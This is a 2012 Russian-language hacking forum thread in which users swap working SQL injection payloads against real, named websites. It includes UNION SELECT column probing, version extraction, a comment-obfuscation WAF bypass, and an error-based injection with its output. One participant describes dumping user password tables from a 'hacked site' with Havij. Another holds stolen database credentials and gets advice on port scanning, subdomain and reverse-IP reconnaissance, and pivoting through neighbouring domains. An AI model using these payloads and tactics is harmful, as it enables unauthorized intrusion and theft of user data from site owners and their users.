 |
|
14.04.2012, 14:20
|
|
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
С нами:
8265206
Репутация:
84
|
|
Сообщение от None
http://www.sin-bad.ru/main.php?f=-10+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16+--+
не могу найти куда выводит =/
|
|
|
14.04.2012, 15:38
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от shadowrun
не могу найти куда выводит =/
http://www.sin-bad.ru/main.php?f=10+UnIoN+sElEcT+1,2,3,4,5,6,7,8,9,10,ve rsion(),12,13,14,15,16--+f
В самом низу
4.0.27-log
|
|
|
|
14.04.2012, 16:01
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от kingbeef
http://www.radimpex.rs/download.php?id=-1/*|UnIoN*//*|aLl*//*|SeLeCt*/1--&lang=en
Это прикол, да?
Что за палки перед операторами?
С чего ты взял, что там фильтр какой-то?
Извините, конечно, но это *facepalm*.
http://www.radimpex.rs/download.php?id=1 and(substring(version(),1,1)=3)&lang=en
Там просто мускул 3ей ветки =\
http://www.radimpex.rs/download.php?id=1 or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1 -- -&lang=en
Duplicate entry ' 3.23.581' for key 1
|
|
|
|
14.04.2012, 16:11
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от Tigger
Это прикол, да?
Что за палки перед операторами?
Гуглил "WAF Bypass" ,нашел видео и по нему делал с "палками"
Сообщение от None
Там просто мускул 3ей ветки =\
Спасибо
|
|
|
|
14.04.2012, 16:21
|
|
Участник форума
Регистрация: 08.01.2010
Сообщений: 155
С нами:
8599678
Репутация:
22
|
|
возникла проблема с выводом приватной информации с похеканного сайта. некоторую информацию выводит нормально, но как только прописываю таблицы с паролями юзеров, сразу перекидывает на главную страницу сайта (и там пропечатывается мой код запроса в каком-нибудь поле). попытался вставить сайт в прогу Havij. она загрузила таблицы и поля. я взял загрузить то поле, которое было с паролями юзеров. но вылезло "Turning off 'bypass illegal union' and retrying". скажите, в чем проблема? я думаю, что нужны права админа. доступ к админке сайта есть
|
|
|
|
14.04.2012, 16:39
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
skagen
Кодировка.
Попробуй:
SELECT unhex(hex(version())) FROM ...
Либо другие варианты, описанные в статьях.
|
|
|
|
14.04.2012, 19:39
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
такой вопрос, есть логин и пароль от БД, phpmyadmin нету, в строке host стоит знак % тоесть можно подключатся к с любого ипа, но проблема в том что нет открытого 3306 порта. както можно ещо иначе подключится или безнадёжно?
|
|
|
|
14.04.2012, 19:41
|
|
Постоянный
Регистрация: 27.02.2011
Сообщений: 733
С нами:
8003126
Репутация:
19
|
|
Сообщение от qaz
такой вопрос, есть логин и пароль от БД, phpmyadmin нету, в строке host стоит знак % тоесть можно подключатся к с любого ипа, но проблема в том что нет открытого 3306 порта. както можно ещо иначе подключится или безнадёжно?
Проскань порты мб на другом висит.
Но мускуль очень редко смотрит наружу.
|
|
|
|
14.04.2012, 19:45
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от mironich
Проскань порты мб на другом висит.
Но мускуль очень редко смотрит наружу.
та сканил, всё что есть
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]Discovered open port 25[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tcp
Discovered open port 110[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tcp
Discovered open port 80[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tcp
Discovered open port 53[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tcp
Discovered open port 443[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tcp[/COLOR][/COLOR]
|
|
|
|
14.04.2012, 23:17
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами:
9384053
Репутация:
303
|
|
Сообщение от qaz
та сканил, всё что есть
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]Discovered open port 25[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tcp
Discovered open port 110[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tcp
Discovered open port 80[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tcp
Discovered open port 53[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tcp
Discovered open port 443[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]tcp[/COLOR][/COLOR]
Это не все что есть. Если сайт того стоит - потрать время , потрудись и проскань как можно большее количество портов. Изучи ответ сервера по каждому порту, а не смотри в дамп проги чем ты там сканишь. К тому-же, посмотри в конфигах и реверс IP какие субдомены имеются. Частенько делают базовый домен на который прекрывают порты а к примеру mysql.site.ru открыт для подключения. Опять -же, через реверс IP пробей может зальешься на смежные домены, тогда локально подключишься.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
